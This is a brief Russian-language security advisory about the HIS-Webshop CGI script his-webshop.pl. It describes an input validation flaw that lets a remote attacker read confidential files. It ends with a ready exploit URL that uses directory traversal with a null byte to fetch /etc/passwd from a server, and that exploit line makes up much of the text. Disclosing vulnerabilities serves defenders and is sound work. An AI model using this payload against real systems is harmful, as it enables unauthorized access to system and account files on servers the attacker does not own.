Программа: HIS-Webshop
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных сценарием his-webshop.pl. Атакующий может получить несанкционированный доступ к конфиденциальной информации на целевой системе.
Эксплоит:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00
